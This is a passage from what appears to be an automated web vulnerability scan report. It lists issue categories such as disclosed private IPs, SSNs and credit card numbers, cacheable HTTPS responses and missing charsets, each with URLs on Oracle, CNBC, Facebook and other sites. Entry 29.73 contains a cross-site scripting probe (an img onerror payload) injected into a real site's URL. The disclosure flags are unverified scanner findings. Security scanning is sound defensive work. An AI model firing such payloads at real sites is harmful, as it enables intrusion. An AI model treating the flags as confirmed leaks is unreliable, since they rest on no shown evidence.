22.36. http://www.covergirl.com/Script/jqModal_mod.js

22.37. http://www.covergirl.com/Script/jquery.cookie.js

22.38. http://www.covergirl.com/Script/jquery.hoverIntent.min.js

22.39. http://www.csc.com/contact_us

22.40. http://www.csc.com/javascripts/public/s_code.js

22.41. http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js

22.42. http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js

22.43. http://www.fekkai.com/js/mootools-1.2.4.2-more.js

22.44. http://www.fekkai.com/js/multibox/multiBox.js

22.45. http://www.fekkai.com/js/multibox/overlay.js

22.46. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

22.47. http://www.harbottle.com/hnl/pages/pubs/479

22.48. http://www.netsuite.com/portal/javascript/DD_roundies.js

22.49. http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js

22.50. http://www.netsuite.com/portal/javascript/jquery.colorbox.js

22.51. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

22.52. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

22.53. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

22.54. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

22.55. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

22.56. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

22.57. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

22.58. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

22.59. http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

22.60. http://www.oracle.com/openworld/contact/index.html

22.61. http://www.oracle.com/openworld/register/packages/index.html

22.62. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

22.63. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

22.64. http://www.oracle.com/us/assets/masterhp.js

22.65. http://www.oracle.com/us/ciocentral/index.html

22.66. http://www.oracle.com/us/corporate/Acquisitions/index.html

22.67. http://www.oracle.com/us/corporate/analystrelations/index.html

22.68. http://www.oracle.com/us/corporate/citizenship/index.html

22.69. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

22.70. http://www.oracle.com/us/corporate/insight/index.html

22.71. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

22.72. http://www.oracle.com/us/corporate/press/Executives/index.html

22.73. http://www.oracle.com/us/corporate/press/index.html

22.74. http://www.oracle.com/us/corporate/profit/index.html

22.75. http://www.oracle.com/us/corporate/publishing/index.html

22.76. http://www.oracle.com/us/education/oukc/email-079121.html

22.77. http://www.oracle.com/us/industries/financial-services/index.html

22.78. http://www.oracle.com/us/industries/retail/index.html

22.79. http://www.oracle.com/us/partnerships/solutions/index.html

22.80. http://www.oracle.com/us/products/applications/primavera/index.html

22.81. http://www.oracle.com/us/sun/index.html

22.82. http://www.oracle.com/us/support/advanced-customer-services/index.html

22.83. http://www.oracle.com/us/support/contact-068555.html

22.84. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

22.85. http://www.rayalab.com/

22.86. http://www.rayalab.com/free_sample.html

22.87. http://www.resourcepoint.net/ATG-Services.htm

22.88. http://www.resourcepoint.net/TibcoTech.htm

22.89. http://www.resourcepoint.net/contactus.htm

22.90. http://www.resourcepoint.net/form.htm

22.91. http://www.revsolutionsinc.com/careers.html

22.92. http://www.revsolutionsinc.com/careers_req_7.html

22.93. http://www.revsolutionsinc.com/contact_us.html

22.94. http://www.sophelle.com/

22.95. http://www.sophelle.com/Contact-Us/

22.96. http://www.sophelle.com/Contact-Us/thank-you.html

22.97. http://www.sophelle.com/Products/

22.98. http://www.sophelle.com/Products/CQ/free-trial.html

22.99. http://www.sophelle.com/Products/CQ/index.html

22.100. http://www.sophelle.com/Products/accelerator2.html

22.101. http://www.sophelle.com/Success-Stories/

22.102. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

22.103. http://www.sophelle.com/products/cq/

22.104. http://www.sophelle.com/products/cq/expert-analysis.html

22.105. http://www.sophelle.com/products/cq/frequently-asked-questions.html

22.106. http://www.sophelle.com/products/cq/functional-testing.html

22.107. http://www.sophelle.com/products/cq/performance-testing.html

22.108. http://www.sophelle.com/products/cq/pricing-options.html

22.109. http://www.sophelle.com/products/cq/thank-you-trial.html

22.110. http://www.sophelle.com/products/cq/user-interface-testing.html

22.111. http://www.tenzing.com/atg-ecommerce-hosting.asp

22.112. http://www.tenzing.com/cloud/cloud-pricing.asp

22.113. http://www.tenzing.com/cloud/sign-up-now.asp

22.114. http://www.tenzing.com/css/basic_stylesheet_v1.1.css

22.115. http://www.tenzing.com/css/navigation_stylesheet_v1.1.css

22.116. http://www.tenzing.com/hosting-solutions.asp

22.117. http://www.tenzing.com/js/jquery/jquery.accordion.js

22.118. http://www.tenzing.com/sitemap.asp

22.119. http://www.tenzing.com/validation.js

23. Private IP addresses disclosed

23.1. http://blog.ulf-wendel.de/

23.2. http://code.openark.org/blog/

23.3. http://developers.facebook.com/plugins/

23.4. http://digg.com/submit

23.5. http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js

23.6. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.7. http://www.facebook.com/extern/login_status.php

23.8. http://www.facebook.com/extern/login_status.php

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/plugins/activity.php

23.11. http://www.facebook.com/plugins/activity.php

23.12. http://www.facebook.com/plugins/like.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.facebook.com/plugins/like.php

23.19. http://www.facebook.com/plugins/like.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.fekkai.com/

23.23. http://www.google.com/sdch/StnTz5pY.dct

23.24. http://www.oracle.com/technetwork/community/developer-vm/index.html

23.25. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

23.26. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

23.27. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

23.28. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

23.29. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

23.30. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

24. Social security numbers disclosed

24.1. http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js

24.2. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

24.3. http://www.shopify.com/admin/auth/login

24.4. http://www.shopify.com/examples

24.5. http://www.shopify.com/login

24.6. http://www.shopify.com/tour

25. Credit card numbers disclosed

25.1. http://api.cnbc.com/api/movers/movers.asp

25.2. http://assets1.csc.com/es/downloads/7380_2.pdf

25.3. http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf

25.4. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

25.5. http://education.oracle.com/education/jscripts/otn_nav1.js

25.6. https://education.oracle.com/education/jscripts/otn_nav1.js

25.7. http://www.oracle.com/ao/index.html

25.8. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

25.9. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

25.10. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

25.11. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

25.12. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

25.13. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

25.14. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

25.15. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

25.16. http://www.oracle.com/index.html

25.17. http://www.oracle.com/technetwork/apps-tech/index-095827.html

25.18. http://www.oracle.com/technetwork/apps-tech/index-097651.html

25.19. http://www.oracle.com/technetwork/apps-tech/index.html

25.20. http://www.oracle.com/technetwork/architect/index.html

25.21. http://www.oracle.com/technetwork/articles/index.html

25.22. http://www.oracle.com/technetwork/community/developer-vm/index.html

25.23. http://www.oracle.com/technetwork/community/join/overview/index.html

25.24. http://www.oracle.com/technetwork/community/oracle-ace/index.html

25.25. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

25.26. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

25.27. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

25.28. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

25.29. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

25.30. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

25.31. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

25.32. http://www.oracle.com/technetwork/dbadev/index.html

25.33. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

25.34. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

25.35. http://www.oracle.com/technetwork/developer-tools/index.html

25.36. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

25.37. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

25.38. http://www.oracle.com/technetwork/index.html

25.39. http://www.oracle.com/technetwork/indexes/documentation/index.html

25.40. http://www.oracle.com/technetwork/indexes/downloads/index.html

25.41. http://www.oracle.com/technetwork/indexes/products/index.html

25.42. http://www.oracle.com/technetwork/java/index.html

25.43. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

25.44. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

25.45. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

25.46. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

25.47. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

25.48. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

25.49. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

25.50. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

25.51. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

25.52. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

25.53. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

25.54. http://www.oracle.com/technetwork/systems/index.html

25.55. http://www.oracle.com/technetwork/topics/cloud/index.html

25.56. http://www.oracle.com/technetwork/topics/index.html

25.57. http://www.oracle.com/technetwork/topics/newtojava/index.html

25.58. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

25.59. http://www.oracle.com/technetwork/topics/security/index.html

25.60. http://www.oracle.com/technetwork/topics/soa/index.html

25.61. http://www.oracle.com/technetwork/topics/virtualization/index.html

25.62. http://www.oracle.com/us/community/index.html

25.63. http://www.oracle.com/us/corporate/Acquisitions/index.html

25.64. http://www.oracle.com/us/corporate/analystrelations/index.html

25.65. http://www.oracle.com/us/corporate/blogs/index.html

25.66. http://www.oracle.com/us/corporate/careers/index.html

25.67. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

25.68. http://www.oracle.com/us/corporate/citizenship/index.html

25.69. http://www.oracle.com/us/corporate/customers/index.html

25.70. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

25.71. http://www.oracle.com/us/corporate/features/engineered-173370.html

25.72. http://www.oracle.com/us/corporate/history/index.html

25.73. http://www.oracle.com/us/corporate/index.html

25.74. http://www.oracle.com/us/corporate/innovation/index.html

25.75. http://www.oracle.com/us/corporate/insight/index.html

25.76. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

25.77. http://www.oracle.com/us/corporate/investor-relations/index.html

25.78. http://www.oracle.com/us/corporate/oracle-racing-070515.html

25.79. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

25.80. http://www.oracle.com/us/corporate/press/Executives/index.html

25.81. http://www.oracle.com/us/corporate/press/index.html

25.82. http://www.oracle.com/us/corporate/pricing/index.html

25.83. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

25.84. http://www.oracle.com/us/corporate/profit/index.html

25.85. http://www.oracle.com/us/corporate/publishing/index.html

25.86. http://www.oracle.com/us/index.html

25.87. http://www.oracle.com/us/industries/communications/index.html

25.88. http://www.oracle.com/us/industries/education-and-research/018753.htm

25.89. http://www.oracle.com/us/industries/engineering-and-construction/index.html

25.90. http://www.oracle.com/us/industries/financial-services/index.html

25.91. http://www.oracle.com/us/industries/index.html

25.92. http://www.oracle.com/us/industries/retail/index.html

25.93. http://www.oracle.com/us/partnerships/solutions/index.html

25.94. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

25.95. http://www.oracle.com/us/products/applications/fusion/index.html

25.96. http://www.oracle.com/us/products/applications/index.html

25.97. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

25.98. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

25.99. http://www.oracle.com/us/products/applications/primavera/index.html

25.100. http://www.oracle.com/us/products/consulting/index.html

25.101. http://www.oracle.com/us/products/database/index.html

25.102. http://www.oracle.com/us/products/enterprise-manager/index.html

25.103. http://www.oracle.com/us/products/financing/index.html

25.104. http://www.oracle.com/us/products/index.html

25.105. http://www.oracle.com/us/products/middleware/exalogic/index.html

25.106. http://www.oracle.com/us/products/middleware/index.html

25.107. http://www.oracle.com/us/products/ondemand/index.html

25.108. http://www.oracle.com/us/products/productslist/index.html

25.109. http://www.oracle.com/us/products/servers-storage/index.html

25.110. http://www.oracle.com/us/products/servers-storage/solaris/index.html

25.111. http://www.oracle.com/us/products/tools/index.html

25.112. http://www.oracle.com/us/social-media/facebook/index.html

25.113. http://www.oracle.com/us/social-media/linkedin/index.html

25.114. http://www.oracle.com/us/social-media/twitter/index.html

25.115. http://www.oracle.com/us/solutions/corporate-governance/index.html

25.116. http://www.oracle.com/us/solutions/datawarehousing/index.html

25.117. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

25.118. http://www.oracle.com/us/solutions/midsize/index.html

25.119. http://www.oracle.com/us/solutions/performance-scalability/index.html

25.120. http://www.oracle.com/us/solutions/solutions-165852.html

25.121. http://www.oracle.com/us/sun/index.html

25.122. http://www.oracle.com/us/support/advanced-customer-services/index.html

25.123. http://www.oracle.com/us/support/contact-068555.html

25.124. http://www.oracle.com/us/support/development-tools-080025.html

25.125. http://www.oracle.com/us/support/index.html

25.126. http://www.oracle.com/us/support/lifetime-support/index.html

25.127. http://www.oracle.com/us/support/oracle-support-services-359636.html

25.128. http://www.oracle.com/us/support/policies/index.html

25.129. http://www.oracle.com/us/support/premier/index.html

25.130. http://www.oracle.com/us/support/support-integration/index.html

25.131. http://www.oracle.com/us/syndication/subscribe/index.html

25.132. http://www.oracle.com/us/technologies/cloud/index.html

25.133. http://www.oracle.com/us/technologies/java/index.html

25.134. http://www.oracle.com/us/technologies/virtualization/index.html

25.135. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

26. Robots.txt file

26.1. http://1215.ic-live.com/goat.php

26.2. http://4qinvite.4q.iperceptions.com/1.aspx

26.3. http://904-kuw-942.mktoresp.com/webevents/visitWebPage

26.4. http://a.tribalfusion.com/displayAd.js

26.5. http://ad.doubleclick.net/adj/nbcu.cnbc/search

26.6. http://ad.yieldmanager.com/pixel

26.7. http://adclick.g.doubleclick.net/aclk

26.8. http://ads.pointroll.com/PortalServe/

26.9. http://adx.g.doubleclick.net/pagead/adview

26.10. http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js

26.11. http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0

26.12. http://api.bizographics.com/v1/profile.redirect

26.13. http://api.twitter.com/1/statuses/user_timeline.json

26.14. http://assets1.csc.com/home/media/billboard195.swf

26.15. http://at.amgdgt.com/ads/

26.16. http://b.scorecardresearch.com/b

26.17. http://blog.harbottle.com/dm

26.18. http://blogs.oracle.com/otn/

26.19. https://bugzilla.mozilla.org/show_bug.cgi

26.20. http://c.betrad.com/surly.js

26.21. http://c.brightcove.com/services/viewer/federated_f9

26.22. http://c.statcounter.com/t.php

26.23. http://cdn.gigya.com/JS/socialize.js

26.24. http://cdn.krxd.net/config/

26.25. http://cdn5.tribalfusion.com/media/1956006/frame.html

26.26. http://clickserve.dartsearch.net/link/click

26.27. http://clk.fetchback.com/serve/fb/click

26.28. http://cm.g.doubleclick.net/pixel

26.29. https://cms.paypal.com/us/cgi-bin/

26.30. http://cnbc.com/crossdomain.xml

26.31. http://content.links.channelintelligence.com/images/blank.gif

26.32. http://convctr.overture.com/images/cc/cc.gif

26.33. http://d.ads.readwriteweb.com/spcjs.php

26.34. http://d1.openx.org/ck.php

26.35. http://d7.zedo.com/jsc/d3/fl.js

26.36. http://deloitte.12hna.com/preferences/index.php

26.37. http://dev.mysql.com/common/js/s_code_remote.js

26.38. http://digg.com/submit

26.39. https://docs.google.com/

26.40. http://download.oracle.com/docs/html/E13982_01/wsassemble.htm

26.41. http://edge.sapient.com/assets/images/favicon.ico

26.42. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc

26.43. https://education.oracle.com/favicon.ico

26.44. http://event.on24.com/r.htm

26.45. https://event.on24.com/eventRegistration/prereg/register.jsp

26.46. http://events.oracle.com/search/search

26.47. http://executivevision.cnbc.com/

26.48. http://fls.doubleclick.net/activityi

26.49. http://fonts.googleapis.com/css

26.50. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

26.51. https://forums.oracle.com/forums/style/style.jsp

26.52. http://img-cdn.mediaplex.com/0/17353/universal.html

26.53. http://imp.fetchback.com/serve/fb/adtag.js

26.54. http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597

26.55. http://keywords.fmpub.net/

26.56. http://l.addthiscdn.com/live/t00/250lo.gif

26.57. http://l.apture.com/v3/

26.58. http://legolas.nexac.com/lgalt

26.59. http://m.cnbc.com/

26.60. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

26.61. http://netsuite-www.baynote.net/baynote/customerstatus2

26.62. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

26.63. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3

26.64. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.65. http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694

26.66. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163

26.67. http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217

26.68. http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592

26.69. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

26.70. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

26.71. https://oracleus.wingateweb.com/portal/newreg.ww

26.72. http://pagead2.googlesyndication.com/pagead/imgad

26.73. http://pg.links.channelintelligence.com/pages/CBLJS.asp

26.74. http://pg.links.origin.channelintelligence.com/pages/wl.asp

26.75. http://pi.pardot.com/analytics

26.76. http://pixel.everesttech.net/1688/i

26.77. http://pixel.fetchback.com/serve/fb/pdc

26.78. http://pixel.mathtag.com/event/img

26.79. http://pixel.quantserve.com/pixel

26.80. http://r.casalemedia.com/j.gif

26.81. http://rd.rlcdn.com/rd

26.82. http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm

26.83. http://rt.legolas-media.com/lgrt

26.84. http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css

26.85. http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf

26.86. http://s7.addthis.com/js/addthis_widget.php

26.87. http://search.oracle.com/search/search

26.88. http://search.twitter.com/search.json

26.89. http://services.krxd.net/pixel.gif

26.90. https://shop.oracle.com/store/Database

26.91. http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf

26.92. http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451

26.93. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

26.94. http://tf.nexac.com/media/1809966/na.html

26.95. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

26.96. http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json

26.97. http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575

26.98. http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif

26.99. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

26.100. http://www.apture.com/js/apture.js

26.101. http://www.atg.com/

26.102. https://www.atg.com/service/main.jsp

26.103. http://www.beautyproductsdirect.com/

26.104. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

26.105. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

26.106. http://www.bizographics.com/collect/

26.107. http://www.cnbc.com/

26.108. http://www.csc.com/

26.109. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

26.110. https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp

26.111. http://www.deloitte.com/

26.112. http://www.facebook.com/extern/login_status.php

26.113. http://www.fetchback.com/

26.114. http://www.google-analytics.com/__utm.gif

26.115. http://www.googleadservices.com/pagead/aclk

26.116. http://www.harbottle.com/hnl/pages/hnl.php

26.117. http://www.imiclk.com/cgi/r.cgi

26.118. http://www.linkedin.com/countserv/count/share

26.119. http://www.marykay.com/

26.120. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

26.121. http://www.oracle.com/index.html

26.122. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

26.123. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

26.124. http://www.shopify.com/

26.125. http://www.sophelle.com/

26.126. http://www.tenzing.com/atg-ecommerce-hosting.asp

26.127. http://www.volusion.com/

26.128. http://www.youtube.com/v/JWMKXb1Guq4

26.129. http://www.znode.com/znode-multifront/default.aspx

26.130. http://www2.znode.com/analytics

27. Cacheable HTTPS response

27.1. https://bugzilla.mozilla.org/show_bug.cgi

27.2. https://deloitte.zettaneer.com/Subscriptions/

27.3. https://dne.oracle.com/pls/uns/OPT_OUT.th

27.4. https://event.on24.com/eventRegistration/prereg/register.jsp

27.5. https://forms.netsuite.com/core/media/media.nl

27.6. https://forums.oracle.com/forums/category.jspa

27.7. https://forums.oracle.com/forums/guestsettings!default.jspa

27.8. https://forums.oracle.com/forums/main.jspa

27.9. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

27.10. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

27.11. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

27.12. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

27.13. https://forums.oracle.com/forums/themes/english/resources/s_code.js

27.14. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

27.15. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

27.16. https://forums.oracle.com/forums/themes/english/resources/style.css

27.17. https://login.cnbc.com/

27.18. https://login.cnbc.com/cas/checkCasTicket

27.19. https://login.oracle.com/oam/server/sso/auth_cred_submit

27.20. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

27.21. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

27.22. https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx

27.23. https://myprofile.oracle.com/EndUser/images/fading-background.png

27.24. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

27.25. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

27.26. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

27.27. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

27.28. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

27.29. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

27.30. https://register.cnbc.com/

27.31. https://register.cnbc.com/email/EmailSupport.jsp

27.32. https://shop.oracle.com/pls/ostore/f

27.33. https://support.oracle.com/

27.34. https://support.oracle.com/CSP/ui/blank.html

27.35. https://support.oracle.com/CSP/ui/flash.html

27.36. https://support.oracle.com/CSP/ui/xml/sunConnect.html

27.37. https://www.atg.com/dojo-1/dijit/nls/loading.js

27.38. https://www.atg.com/favicon.ico

27.39. https://www.cvs.com/CVSApp/html/blank.html

27.40. https://www.cvs.com/CVSApp/user/forgot_password.jsp

27.41. https://www.cvs.com/CVSApp/user/login.jsp

28. Multiple content types specified

29. HTML does not specify charset

29.1. http://a.tribalfusion.com/i.cid

29.2. http://a.tribalfusion.com/j.ad

29.3. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

29.4. http://a.tribalfusion.com/z/i.cid

29.5. http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394

29.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

29.7. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

29.8. http://ad.doubleclick.net/clk

29.9. http://ads.pointroll.com/PortalServe/

29.10. http://api-cdn.cnbc.com/api/chart/chart.asp

29.11. http://api.cnbc.com/api/chart/chart.asp

29.12. http://api.cnbc.com/api/movers/movers.asp

29.13. http://apps.cnbc.com/

29.14. http://apps.cnbc.com/Includes/CheckPng/Script.asp

29.15. http://apps.cnbc.com/company/quote/incchart.asp

29.16. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

29.17. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

29.18. http://blog.harbottle.com/dm/xmlrpc.php

29.19. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

29.20. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

29.21. http://blogs.oracle.com/otn/resource/SunOracle.png

29.22. http://blogs.oracle.com/otn/resource/java-logo.png

29.23. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

29.24. http://blogs.oracle.com/theme/scripts/roller.js

29.25. http://c.brightcove.com/services/messagebroker/amf

29.26. http://cdn.krxd.net/kruxcontent/krux_iframe.html

29.27. http://cdn5.tribalfusion.com/media/1956006/frame.html

29.28. http://cdn5.tribalfusion.com/media/2516896//frm.html

29.29. http://ds.addthis.com/red/psi/sites/www.dove.us/p.json

29.30. http://fls.doubleclick.net/activityi

29.31. http://install.volusion.com/installer/demos/Empty.htm

29.32. http://js.adsonar.com/js/pass.html

29.33. https://login.cnbc.com/

29.34. http://m.cnbc.com/mytest/ipecho.php

29.35. https://myprofile.oracle.com/EndUser/images/fading-background.png

29.36. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

29.37. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

29.38. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

29.39. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

29.40. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

29.41. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.42. http://optimized-by.rubiconproject.com/a/dk.html

29.43. http://pro.cnbc.com/

29.44. http://pro.cnbc.com/index.asp

29.45. https://register.cnbc.com/

29.46. https://register.cnbc.com/RandomImage.jsp

29.47. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

29.48. https://support.oracle.com/

29.49. https://support.oracle.com/CSP/ui/xml/sunConnect.html

29.50. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

29.51. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

29.52. http://tf.nexac.com/media/1809966/na.html

29.53. http://ticker.cnbc.com/

29.54. http://tps31.doubleverify.com/visit.js

29.55. http://uac.advertising.com/wrapper/aceUACping.htm

29.56. http://videometa.cnbc.com/getadmincontent.do

29.57. http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478

29.58. http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994

29.59. http://view.atdmt.com/FXM/iview/308880957/direct/01/466318

29.60. http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911

29.61. http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867

29.62. http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540

29.63. http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761

29.64. http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182

29.65. http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164

29.66. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

29.67. http://wd.sharethis.com/api/getCount2.php

29.68. http://www.bigcommerce.com/freetrial.php

29.69. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

29.70. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

29.71. http://www.gillettevenus.com/en_US/images/go_roll.png

29.72. http://www.gillettevenus.com/global/blank.html

29.73. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

29.74. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

29.75. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

